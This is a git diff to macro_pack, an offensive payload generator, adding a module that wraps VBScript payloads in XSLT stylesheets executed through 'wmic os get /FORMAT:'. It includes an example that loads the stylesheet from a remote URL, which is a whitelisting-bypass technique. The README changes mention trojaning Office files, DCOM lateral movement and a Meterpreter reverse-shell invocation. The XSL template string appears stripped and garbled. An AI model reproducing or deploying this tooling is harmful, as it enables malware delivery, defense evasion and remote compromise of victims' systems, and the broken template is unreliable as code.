diff --git a/README.md b/README.md
index e6cd780..b43374e 100644
--- a/README.md
+++ b/README.md
@@ -42,7 +42,7 @@ Note that the main goal of macro\_pack obfuscation is not to prevent reverse eng
Macro Pack can generate several kind of MS office documents and scripts formats.
The format will be automatically guessed depending on the given file extension.
File generation is done using the option --generate or -G.
-Macro Pack pro version also allow to trojan existing files with option --trojan or -T
+Macro Pack pro version also allow to trojan existing Office files with option --trojan or -T
Ms Office Supported formats are:
* MS Word 97 (.doc)
@@ -60,6 +60,7 @@ Scripting (txt) supported formats are:
* Windows Script File (.wsf)
* Windows Script Components scriptlets (.wsc, .sct)
* HTML Applications (.hta)
+* XSLT Stylesheet (.xsl) (Yes MS XSLT contains scripts ^^)
Shortcuts supported formats are:
* Shell Link (.lnk)
@@ -89,7 +90,7 @@ The pro mode includes features such as:
* Lateral movement using DCOM objects
* Anti-debug using http://seclists.org/fulldisclosure/2017/Mar/90
-For now I do not plan to release or sell this pro version however if you are really interested I can share pro binary in the next case:
+For now I do not plan to release or sell this pro version however if you are really interested I can share code in the next case:
* You significantly contribute to macro\_pack on GitHub + I need to know your identity
@@ -310,7 +311,7 @@ echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\\192.168.0.8\c$\us
-G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the format based on extension.
Supported Ms Office extensions are: doc, docm, docx, xls, xlsm, xslx, pptm, vsd, vsdm, mpp.
Note: Ms Office file generation requires Windows OS with right MS Office application installed.
- Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta.
+ Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta, xsl.
Supported shortcuts extensions are: scf, url, glk
-e, --embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document.
@@ -482,7 +483,8 @@ If you have an issue with macro\_pack AV detection you can write to us for advic
## Relevant resources
-Blog posts about MS Office & retro stuff security:
+Blog posts about hacking with MS Office, VBS, and other retro stuff security:
+ - https://subt0x11.blogspot.fr/2018/04/wmicexe-whitelisting-bypass-hacking.html
- http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)
- http://blog.sevagas.com/?Hacking-around-HTA-files (run hta code in non-hta files and hta polyglots)
- http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.html
@@ -500,7 +502,7 @@ Blog posts about MS Office & retro stuff security:
- https://www.metasploit.com/
- https://github.com/Cn33liz/MacroMeter
- https://github.com/khr0x40sh/MacroShop
-
+ - https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
## Contact
diff --git a/assets/xsl_webmeter.png b/assets/xsl_webmeter.png
new file mode 100644
index 0000000..183d7ad
Binary files /dev/null and b/assets/xsl_webmeter.png differ
diff --git a/src/common/help.py b/src/common/help.py
index 6983c39..72dd55a 100644
--- a/src/common/help.py
+++ b/src/common/help.py
@@ -177,7 +177,7 @@ def printUsage(banner, currentApp, mpSession):
-G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the format based on extension.
Supported Ms Office extensions are: doc, docm, docx, xls, xlsm, xslx, pptm, vsd, vsdm, mpp.
Note: Ms Office file generation requires Windows OS with right MS Office application installed.
- Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta.
+ Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta, xsl.
Supported shortcuts extensions are: lnk, scf, url, glk
-e, --embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document.
diff --git a/src/common/utils.py b/src/common/utils.py
index 8324136..3bd4767 100644
--- a/src/common/utils.py
+++ b/src/common/utils.py
@@ -59,17 +59,18 @@ class MSTypes():
LNK="Shell Link"
GLK = "Groove Shortcut"
SCF="Explorer Command File"
+ XSL="XSLT Stylesheet"
URL="URL Shortcut"
UNKNOWN = "Unknown"
MS_OFFICE_FORMATS = [ XL, XL97, WD, WD97, PPT, MPP, VSD, VSD97] # Formats supported by macro_pack
- VB_FORMATS = [VBA, VBS, HTA, SCT, WSF ]
+ VB_FORMATS = [VBA, VBS, HTA, SCT, WSF, XSL ]
VB_FORMATS.extend(MS_OFFICE_FORMATS)
Shortcut_FORMATS = [LNK, GLK, SCF, URL]
EXTENSION_DICT = { LNK:".lnk", GLK:".glk", SCF:".scf", URL:".url", XL:".xlsm", XL97:".xls", WD:".docm",
WD97:".doc", PPT:".pptm", PPT97:".ppt", MPP:".mpp", PUB:".pub", VSD:".vsdm", VSD97:".vsd",
- VBA:".vba", VBS:".vbs", HTA:".hta", SCT:".wsc", WSF:".wsf" }
+ VBA:".vba", VBS:".vbs", HTA:".hta", SCT:".wsc", WSF:".wsf", XSL:".xsl" }
@classmethod
def guessApplicationType(self, documentPath):
@@ -114,6 +115,8 @@ def guessApplicationType(self, documentPath):
result = self.LNK
elif ".scf" == extension.lower():
result = self.SCF
+ elif ".xsl" == extension.lower():
+ result = self.XSL
else:
result = self.UNKNOWN
return result
diff --git a/src/macro_pack.py b/src/macro_pack.py
index 9a559cd..8319ca6 100755
--- a/src/macro_pack.py
+++ b/src/macro_pack.py
@@ -22,6 +22,7 @@
from modules.com_run import ComGenerator
from modules.listen_server import ListenServer
from modules.scf_gen import SCFGenerator
+from modules.xsl_gen import XSLGenerator
from modules.url_gen import UrlShortcutGenerator
from modules.glk_gen import GlkGenerator
from modules.lnk_gen import LNKGenerator
@@ -366,6 +367,10 @@ def main(argv):
if mpSession.outputFileType == MSTypes.SCF:
generator = SCFGenerator(mpSession)
generator.run()
+
+ if mpSession.outputFileType == MSTypes.XSL:
+ generator = XSLGenerator(mpSession)
+ generator.run()
if mpSession.outputFileType == MSTypes.URL:
generator = UrlShortcutGenerator(mpSession)
diff --git a/src/modules/xsl_gen.py b/src/modules/xsl_gen.py
new file mode 100644
index 0000000..de5c1c0
--- /dev/null
+++ b/src/modules/xsl_gen.py
@@ -0,0 +1,56 @@
+#!/usr/bin/env python
+# encoding: utf-8
+
+import logging
+from modules.vbs_gen import VBSGenerator
+
+XSL_TEMPLATE = \
+r"""
+
+
+>>
+<<>>
+
+
+]]>
+
+
+"""
+
+
+
+class XSLGenerator(VBSGenerator):
+ """ Module used to generate XSL file from working dir content
+ To execute:
+ wmic os get /FORMAT:test.xsl
+ Also work on remote files
+ wmic os get /FORMAT:http://www.domain.blah/hello.xsl
+ """
+
+
+ def generate(self):
+ logging.info(" [+] Generating %s file..." % self.outputFileType)
+ self.vbScriptConvert()
+ f = open(self.getMainVBAFile()+".vbs")
+ vbsContent = f.read()
+ f.close()
+
+ XSL_ECHO= r"""CreateObject("WScript.Shell").Run("cmd /c echo XSLT does not handle output message! & PAUSE") '"""
+ vbsContent = vbsContent.replace("WScript.Echo ", XSL_ECHO)
+
+ # Write VBS in template
+ xslContent = XSL_TEMPLATE
+ xslContent = xslContent.replace("<<>>", vbsContent)
+ xslContent = xslContent.replace("<<>>", self.startFunction)
+ # Write in new HTA file
+ f = open(self.outputFilePath, 'w')
+ f.writelines(xslContent)
+ f.close()
+ logging.info(" [-] Generated %s file: %s" % (self.outputFileType, self.outputFilePath))
+ logging.info(" [-] Test with : \nwmic os get /FORMAT:\"%s\"\n" % self.outputFilePath)
+
+
+
+
+
\ No newline at end of file